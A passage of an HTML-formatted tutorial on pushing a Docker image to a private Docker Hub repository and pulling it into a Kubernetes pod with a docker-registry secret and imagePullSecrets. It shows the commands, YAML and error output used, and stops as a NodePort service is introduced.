&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ sudo docker run --name car-demo -p 8686:80 &amp;lt;user_name&amp;gt;/cars-app&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: using the &amp;quot;epoll&amp;quot; event method&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: nginx/1.23.1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: built by gcc 11.2.1 20220219 (Alpine 11.2.1_git20220219)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: OS: Linux 5.15.0-41-generic&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: getrlimit(RLIMIT_NOFILE): 1048576:1048576&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: start worker processes&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: start worker process 7&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: start worker process 8&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: start worker process 9&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2022/09/08 22:53:47 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: start worker process 10&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Sanity Check please ! Oh everything is OK !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/nQ6NcxG.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;push-the-container-image-to-private-repo&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#push-the-container-image-to-private-repo&#34;&gt;#&lt;/a&gt; Push the container image to private repo&lt;/h2&gt;
&lt;p&gt;Now go and create a private repository in your dockerhub to push it !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ sudo docker image push &amp;lt;user_name&amp;gt;/cars-app&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Using default tag: latest&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;The push refers to repository [docker.io/&amp;lt;user_name&amp;gt;/cars-app]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41c30355eff8: Pushed&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;f2ba5e032e84: Pushed&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43e1f37b87cb: Pushed&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bf4e176a4d9b: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;a1d571e4e83d: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6d97b4d00719: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2a7647ca3937: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;549c42eea4a6: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;994393dc58e7: Mounted from library/nginx&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to deal with our kubernetes cluster !&lt;/p&gt;
&lt;h1 id=&#34;use-the-private-docker-image-in-kubernetes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#use-the-private-docker-image-in-kubernetes&#34;&gt;#&lt;/a&gt; Use the private docker image in Kubernetes&lt;/h1&gt;
&lt;p&gt;In this demo I will use a production kubernetes cluster with 1 master node and 1 worker node&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl get nodes&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME      STATUS   ROLES                  AGE   VERSION&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;master    Ready    control-plane,master   77d   v1.23.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;worker1   Ready    &amp;lt;none&amp;gt;                 77d   v1.23.1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s create a namespace for this demo !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl create ns private-docker&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;namespace/private-docker created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;To make our cluster pull private images we need to create a special secret object with specific type called  &lt;code&gt;docker-registry&lt;/code&gt;  secret. To make this secret work correctly you must specify the docker registry, username , password and docker email!&lt;/p&gt;
&lt;p&gt;I prefer to put this params in variable environment to work with it easly&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; EMAIL=&amp;lt;email&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; USERNAME=&amp;lt;user_name&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; PASSWORD=&amp;lt;password&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; SERVER=&amp;lt;docker_registry&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In case you will use dockerhub as your registry you don’t have to specify the server !&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl create -n private-docker secret docker-registry docker-secret --docker-username=$USERNAME --docker-password=$PASSWORD --docker-email=$EMAIL&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;secret/docker-secret created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s create a pod with the image that we made it !&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;run:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;private-docker&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;user_name&amp;gt;/cars-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;dnsPolicy:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterFirst&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;restartPolicy:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Always&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;status:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;If you try create this pod with this YAML definition you’ll get a  &lt;code&gt;ErrImagePull&lt;/code&gt;  because we don’t specify the docker secret that we created&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl get pods -n private-docker&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME           READY   STATUS         RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cars-app-pod   0/1     ErrImagePull   0          5s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s figure out the problem with  &lt;code&gt;kubectl describe&lt;/code&gt;  command. Take a look at the events that occur when the pod try to pull the container image!&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Events:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Type     Reason          Age                From               Message&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; ----     ------          ----               ----               -------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Normal   Scheduled       44s                default-scheduler  Successfully assigned private-docker/cars-app-pod to worker1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Normal   SandboxChanged  40s                kubelet            Pod sandbox changed, it will be killed and re-created.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Normal   Pulling         26s (x2 over 43s)  kubelet            Pulling image &amp;quot;&amp;lt;user_name&amp;gt;/cars-app&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Warning  Failed          23s (x2 over 40s)  kubelet            Failed to pull image &amp;quot;&amp;lt;user_name&amp;gt;/cars-app&amp;quot;: rpc error: code = Unknown desc = Error response from daemon: pull access denied for &amp;lt;user_name&amp;gt;/cars-app, repository does not exist or may require &amp;#x27;docker login&amp;#x27;: denied: requested access to the resource is denied&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Warning  Failed          23s (x2 over 40s)  kubelet            Error: ErrImagePull&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Normal   BackOff         12s (x4 over 39s)  kubelet            Back-off pulling image &amp;quot;&amp;lt;user_name&amp;gt;/cars-app&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Warning  Failed          12s (x4 over 39s)  kubelet            Error: ImagePullBackOff&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Specifying the docker secret in the pod YAML definition will solve this problem. The pod will pull the container image without any problem&lt;br&gt;
Adding  &lt;code&gt;imagePullSecrets&lt;/code&gt;  attributes in the  &lt;code&gt;spec&lt;/code&gt;  of the pod allow the pod to pull this image. The Final YAML definition will be similar to the following one !&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;run:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;private-docker&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;user_name&amp;gt;/cars-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;cars-app-pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;imagePullSecrets:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;docker-secret&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;dnsPolicy:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterFirst&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;restartPolicy:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Always&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;status:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create the pod again and check it with  &lt;code&gt;kubectl get pods&lt;/code&gt;  and don’t forget to specify the namespace!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ kubectl get pods -n private-docker&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME           READY   STATUS    RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cars-app-pod   1/1     Running   0          4s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;I want to make sure that everything is ok, so i will expose this pod using the NodePort service. The following service YAML Definition will expose the pod correctly :&lt;/p&gt;
